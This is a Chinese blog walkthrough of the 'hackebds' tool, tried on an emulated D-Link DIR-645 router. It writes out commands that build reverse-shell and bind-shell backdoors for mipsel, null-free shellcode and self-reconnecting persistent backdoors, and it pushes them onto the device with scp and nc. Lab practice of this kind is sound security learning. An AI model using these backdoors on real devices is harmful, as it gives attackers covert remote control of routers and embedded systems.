嵌入式设备后门工具的利用
嵌入式设备后门工具的利用
这里笔者也是直接跟着作者进行漏洞利用复现的
这里贴出师傅的文章:嵌入式设备后门与shellcode生成工具
简介
hackebds是嵌入到设备的工具,它有以下几种功能:
- 生成各种架构的后门程序,后门程序是用于反向shell汇编代码打包的,大小很小,且纯静态,现目前支持rmv5、Armv7、Armv8、mipsel和mips,mips64,mips64el,powerpc,powerpc64,sparc,riscv64,mipsn32。
- 在攻击过程找那个生成各种架构的反向shell代码,且无空字节,有助于攻击嵌入式设备上的内存损害漏洞。
- 生成各种架构的bind_shell
- 针对嵌入式设备存在可利用的漏洞POC或EXP进行整理,在使用中可以通过搜索输出设备型号输得基本信息与POC。
- 支持命令行生成后门和代买外壳,特点是轻便、小巧、高效、快速。
下载
bash
1 | sudo pip3 install -U hackebds |
然后作者介绍了好多种生成对应各种架构的后门程序,怎么说,笔者这里也是有点小蒙。
环境搭建
简单试一下吧,这里笔者的漏洞设备是D-Link DIR-645,可以参考笔者这篇文章:CNVD-2013-11625
尝试漏洞利用
生成后门程序
反弹shell
- 这里笔者也是尝试了一下反弹mipsel架构的设备后门程序。因为网卡是自己配的,所以ip和端口都是知道的。
bash
1 | hackebds -reverse_ip 192.168.100.254 -reverse_port 9999 -arch mipsel -res reverse_shell_file |
- 这里生成之后我们还是用scp传进模拟环境
bash
1 | scp mips-backdoor-Mwpn root@192.168.100.2:/ |
- 传进去之后,监听9999端口,给文件一个可执行权限,之后运行该文件也是成功反弹上shell了
- 结束的话,终止这边的反弹shell即可
这里默认反向shell的使用的是sh,如果是使用bash则更改命令
bash
1 >hackebds -reverse_ip 192.168.100.254 -reverse_port 9999 -arch mipsel -res reverse_shell_file -shell bashquem指令
bash
1
2 >ps aux | grep qemu #查看进程
>kill -9 XXXX #终结进程
正向弹shell
- 望文生义,就是正向弹shell
bash
1 | hackebds -bind_port 9999 -arch mipsel -res bind_shell -passwd aaaa |
- 老样子scp传进去,运行程序,这边正向连接
nc 192.168.100.2 9999
生成shellcode
- 这块生成的shellcode也是试了一下
bash
1 | hackebds -reverse_ip 192.168.100.254 -reverse_port 9999 -arch mipsel -res reverse_shellcode |
这里笔者以为会像免杀一样,要写一个加载器之类的。这里也是直接拷打GPT,写了个python文件
python
1 | #!/usr/bin/env python3 |
直接就反弹shell了
其他用法
- 如果需要生成后门不断地创建反向shell
bash
1 | hackebds -reverse_ip 127.0.0.1 -reverse_port 8081 -arch armelv7 -res reverse_shell_file -shell bash -power |
- 如果需要每5秒创建一次反向shell
bash
1 | hackebds -reverse_ip 127.0.0.1 -reverse_port 9999 -arch mipsel -res reverse_shell_file -power -sleep 5 |
- 生成cmd_file,只需要指定-cmd参数即可生成各种架构执行对应命令的程序
bash
1 | hackebds -cmd "ls -al /" -arch mipsel -res cmd_file |
- 列出设备模块
bash
1 | hackebds -l |
- 对设备进行检索
bash
1 | pip3 install python-levenshtein #增加对设备检索的速度 |
- 生成设备对应的POC可以使用-p或者–poc,如果POC与EXP是python脚本那么会生成脚本文件(.py)
bash
1 | hackebds -model ex200 -p |
- 对CVE进行检索
bash
1 | hackebds -CVE CVE-2019-17621 |
总结
怎么说呢?这里笔者只试了三种方法,还有几种没用试,觉得也很不错,工具绝对是物超所值。感谢作者的工具对我的漏洞利用提供了莫大的帮助,在这里再次感谢作者。下方贴出作者的github工具地址。
感谢师傅写的工具:doudoudedi/hackEmbedded,喜欢这个工具的可以给作者点一个星星。
特别感谢:
感谢师傅对笔者的莫大帮助!!!
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Bosh's Blog!